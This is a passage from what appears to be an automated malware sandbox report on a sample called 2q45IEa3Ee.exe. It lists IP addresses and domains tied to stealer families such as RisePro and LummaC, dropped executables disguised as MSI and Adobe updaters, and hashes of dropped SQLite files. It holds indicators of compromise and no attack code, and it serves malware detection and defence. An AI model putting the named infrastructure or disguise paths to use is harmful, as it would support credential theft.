                                                                                                                          • 34.117.186.192
                                                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          s.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          s.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          db-ip.comfile.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                          • 104.26.4.15
                                                                                                                          SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 104.26.5.15
                                                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 104.26.4.15
                                                                                                                          s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 172.67.75.166
                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                          • 104.26.5.15
                                                                                                                          UeW2b6mU6Z.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                                          • 104.26.5.15
                                                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 104.26.4.15
                                                                                                                          dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 104.26.5.15
                                                                                                                          Q73YlTAmWe.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 104.26.4.15
                                                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 104.26.4.15
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                          GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          http://134.213.29.14:82/grep.x86_64Get hashmaliciousIPRoyal PawnsBrowse
                                                                                                                          • 34.117.121.53
                                                                                                                          jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          https://diversityjobs.com/employer/company/1665/Worthington-Industries-IncGet hashmaliciousUnknownBrowse
                                                                                                                          • 34.66.73.214
                                                                                                                          CLOUDFLARENETUSY98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 172.66.48.103
                                                                                                                          WjikmGPcSC.exeGet hashmaliciousDCRatBrowse
                                                                                                                          • 172.67.186.200
                                                                                                                          2FjvjcayaH.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.15.198
                                                                                                                          ValoClient.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                          • 104.21.95.148
                                                                                                                          qrLdMv1QXG.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.15.198
                                                                                                                          PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.11.250
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.163.209
                                                                                                                          SecuriteInfo.com.PUA.Biztree.1653.24897.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          SecuriteInfo.com.PUA.Biztree.1653.24897.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 1.1.1.1
                                                                                                                          FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                          • 193.233.132.175
                                                                                                                          SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 193.233.132.226
                                                                                                                          SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 193.233.132.226
                                                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 147.45.47.93
                                                                                                                          jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                          • 193.233.132.175
                                                                                                                          74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                          • 193.233.132.234
                                                                                                                          qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                          • 193.233.132.226
                                                                                                                          s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 147.45.47.93
                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeGet hashmaliciousAmadeyBrowse
                                                                                                                          • 193.233.132.56
                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                          • 193.233.132.167
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1Pictures.com.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          • 104.26.5.15
                                                                                                                          • 34.117.186.192
                                                                                                                          2FjvjcayaH.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          • 104.26.5.15
                                                                                                                          • 34.117.186.192
                                                                                                                          qrLdMv1QXG.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          • 104.26.5.15
                                                                                                                          • 34.117.186.192
                                                                                                                          PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          • 104.26.5.15
                                                                                                                          • 34.117.186.192
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          • 104.26.5.15
                                                                                                                          • 34.117.186.192
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
file.exe | malicious | Clipboard Hijacker, RisePro Stealer
LwnI84BBtb.exe | malicious | LummaC
SajWKdHxdF.exe | malicious | RisePro Stealer
file.exe | malicious | LummaC
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | qk9TaBBxh8.exe | malicious | LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader
C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer
C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | TANQUIVUIA.exe | malicious | LummaC, RisePro Stealer
C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | qk9TaBBxh8.exe | malicious | LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader
C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer
C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | TANQUIVUIA.exe | malicious | LummaC, RisePro Stealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | qk9TaBBxh8.exe | malicious | LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | TANQUIVUIA.exe | malicious | LummaC, RisePro Stealer
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):315904
                                                                                                                                            Entropy (8bit):7.9900301024348765
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:DVa+NrJiVBc2wc6oKXwdUWFQg1SGWEWAMiY7ivtaqgntTZXHAYq7:J1NrJaBcOOiHWEWAMFKtdstTfq
                                                                                                                                            MD5:C60F5FA3A579BCA2C8C377F7E15B2221
                                                                                                                                            SHA1:D44B5C6DD64284F00D6F9D05CF5327A91CAD9339
                                                                                                                                            SHA-256:F5913E753281DBDF88F36C73D13AFBF4AF62046E25F8E148E87A80E88818C4D7
                                                                                                                                            SHA-512:F419ADF4BD07CE18D9B7DE7445B2D0185653DE27738FD4403F880EE11BF49CA8A1958C1B2C94F8F4C5DA52EBC79462CFB6FE71849439F6AF017A95B44AF2F77B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
• Antivirus: Virustotal, Detection: 77%
Joe Sandbox View:
• Filename: qk9TaBBxh8.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe, Detection: malicious
• Filename: TANQUIVUIA.exe, Detection: malicious
                                                                                                                                            Process:C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                            Process:C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):4.0050635535766075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                            MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                            SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                            SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                            SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98304
                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5242880
                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):159744
                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126976
                                                                                                                                            Entropy (8bit):0.47147045728725767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                            MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                            SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                            SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                            SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):159744
                                                                                                                                            Entropy (8bit):0.7873599747470391
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                            MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                            SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                            SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                            SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106496
                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):114688
                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40960
                                                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49152
                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\Desktop\2q45IEa3Ee.exe
